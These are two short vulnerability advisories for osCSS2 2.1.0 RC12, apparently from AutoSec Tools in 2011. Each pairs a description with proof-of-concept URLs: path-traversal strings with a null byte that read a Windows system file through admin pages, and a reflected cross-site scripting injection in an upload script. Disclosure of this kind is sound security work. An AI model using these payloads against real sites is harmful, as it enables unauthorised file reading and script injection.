------------------------------------------------------------------------ Software................osCSS2 2.1.0 RC12 Vulnerability...........Local File Inclusion Threat Level............Critical (4/5) Download................http://www.oscss.org/ Disclosure Date.........4/6/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in osCSS2 2.1.0 RC12 can be exploited to include arbitrary files. --PoC-- http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 ------------------------------------------------------------------------ Software................osCSS2 2.1.0 RC12 Vulnerability...........Reflected Cross-site Scripting Threat Level............Low (1/5) Download................http://www.oscss.org/ Disclosure Date.........4/6/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in osCSS2 2.1.0 RC12 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//